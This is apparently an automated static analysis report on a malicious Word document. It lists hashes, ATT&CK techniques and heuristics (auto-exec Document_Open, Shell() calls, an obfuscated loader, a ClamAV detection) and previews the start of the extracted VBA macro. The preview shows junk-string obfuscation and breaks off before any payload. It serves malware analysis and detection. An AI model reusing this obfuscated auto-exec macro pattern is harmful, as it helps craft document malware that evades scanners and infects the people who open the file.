Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6a8778a466c66a4a…

MALICIOUS

Office (OLE)

169.5 KB Created: 2018-04-09 07:32:00 Authoring application: Microsoft Office Word First seen: 2019-01-11
MD5: c7a5ce4e45590b83e8de9d1319e19c8c SHA-1: 74fcf857af46aa07663574e67f5bf9549ca09153 SHA-256: 6a8778a466c66a4a6df07163459bbe5cb4971109a3a4057330bc7c07014f7462
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a Microsoft Office document containing a malicious VBA macro. The macro is obfuscated and uses the Document_Open auto-execution event. It contains critical heuristics for Shell() calls and an obfuscated auto-exec loader, indicating it is designed to download and execute a second-stage payload. ClamAV also detected it as Doc.Malware.Chronos-6897935-0.

Heuristics 7

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 38346 bytes
SHA-256: 8b86a6bdea471886e6d9c261f2a80164006635f6a2f100bac9590600f7c2ba0c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function fkelbskfbse() As Integer
    fljkeb = "328198"
    fbebl = 3113 - 434
    fkelbskfbse = fbebl - 100
End Function
Private Sub Document_Open()
    fbjlz = fkelbskfbse()
    For WCAiQ = 0 To 43
        wAHD = StrReverse("AhQYazmKTMAmYIlgB")
        wAHD = StrReverse("UfjdrVWkKpx")
        wAHD = StrReverse("kSCJKPTUIOEyh")
        wAHD = Replace("eETiUOrfLyL", "eET", "WsVo")
        wAHD = StrReverse("fsOLEgKzmpzMUVUxscE")
                If 2460080 = 251 - 1030 Then
            WZQFk = Replace("yLpJOkMkJuDioloOyR", "yLp", "UBdQ")
            WZQFk = StrReverse("yLpJOkMkJuDioloOyR")
            End If
        wAHD = StrReverse("ajovTqhBwihlT")
        wAHD = StrReverse("HHATwKBzGpXvJk")
        wAHD = StrReverse("iVniFinWKjgizXfl")
        wAHD = Replace("fAEIaQdhLYkpHnauo", "fAE", "hIuQ")
        wAHD = StrReverse("JeXHjuyaoDgZnwXZPg")
                If 914079 = 123 - 5968 Then
            gGHdv = Replace("DoltaeVorYyRq", "Dol", "oAdvb")
            gGHdv = StrReverse("DoltaeVorYyRq")
            rKfOt = Replace("wklGwScLbh", "wkl", "rXckatj")
            rKfOt = StrReverse("wklGwScLbh")
            End If
        wAHD = Replace("GRCyPUfbll", "GRC", "mpDEORX")
        wAHD = Replace("BpqHYpYOQuTxsrE", "Bpq", "lOXMB")
        wAHD = Replace("fYEfRPhzBcYE", "fYEf", "LtuGLDp")
        wAHD = StrReverse("hMhglFXgXLZoAAABF")
        wAHD = Replace("CwxoSETPfHo", "Cwxo", "dOpCkJ")
        wAHD = StrReverse("ZRaVPcAiwhm")
        wAHD = Replace("iLJngfexTayQTGLOloV", "iLJn", "QcdPTz")
                If 617267 = 101 - 7641 Then
            VsTQR = Replace("JSMfotHPmyPDIwUS", "JSM", "EkJoVfV")
            VsTQR = StrReverse("JSMfotHPmyPDIwUS")
            End If
        wAHD = Replace("fcyLqpennbdgRxcHufF", "fcyL", "xUrlR")
        wAHD = StrReverse("UyqriZSgGhaitQ")
        wAHD = Replace("ekJvQPBXLGw", "ekJv", "BKejq")
                If 991289 = 53 - 2878 Then
            xgaUw = Replace("dKaoXSTwLtl", "dKao", "OGcUo")
            xgaUw = StrReverse("dKaoXSTwLtl")
            End If
        wAHD = StrReverse("somGOJzXdbUeGDIgrEY")
    Next WCAiQ
    If 1659259 = 41 - 3507 Then
        MAxcw = Replace("BUzotIEcbHv", "BUz", "yAFOUfO")
        MAxcw = StrReverse("BUzotIEcbHv")
        afdAl = Replace("xoXgQQHHgXohL", "xoXg", "aCMK")
        afdAl = StrReverse("xoXgQQHHgXohL")
        End If
qzozUa = StrReverse("sGnDcfwsqwa")
    If 2929590 = 135 - 4290 Then
        CObTT = Replace("uijpvcMQsZHTh", "uijp", "ZFiLk")
        CObTT = StrReverse("uijpvcMQsZHTh")
        End If
    For nGlQZ = 0 To 182
                If 525399 = 51 - 5529 Then
            bOrQe = Replace("dWEPHfiMTK", "dWE", "Hptmm")
            bOrQe = StrReverse("dWEPHfiMTK")
            pwrxZ = Replace("yXXTCgOBHPuneEAEdhW", "yXXT", "qCtWPq")
            pwrxZ = StrReverse("yXXTCgOBHPuneEAEdhW")
            End If
        Egas = StrReverse("WruLHlQERCDGayY")
        Egas = StrReverse("OXjsXmWDDreuIFJacAK")
        Egas = StrReverse("YrpCihKhVEvVb")
        Egas = Replace("fnFGTulUXGCUDb", "fnF", "qGPXR")
                If 1023309 = 164 - 4472 Then
            QXYzO = Replace("OFoyXyODkpfJxRbMQ", "OFoy", "wFXMfIk")
            QXYzO = StrReverse("OFoyXyODkpfJxRbMQ")
            End If
        Egas = StrReverse("lWALjdrxRErlA")
        Egas = StrReverse("clHckpiKsISvunkoKUG")
        Egas = StrReverse("CLRGskVgPJbHDiG")
        Egas = Replace("qVksszdQke", "qVks", "pnrT")
        Egas = Replace("pAnTkifLfSiHbTXtHZ", "pAnT", "WslHhdK")
                If 30307 = 5 - 165 Then
            nDtRK = Replace("HBKDEVkOyXkqs", "HBK", "Jrcji")
            nDtRK = StrReverse("HBKDEVkOyXkqs")
            End If
        Egas = StrReverse("EQpqyCnoIO")
        Egas = StrReverse("hUHEgLOzlKPqMv")
    
... (truncated)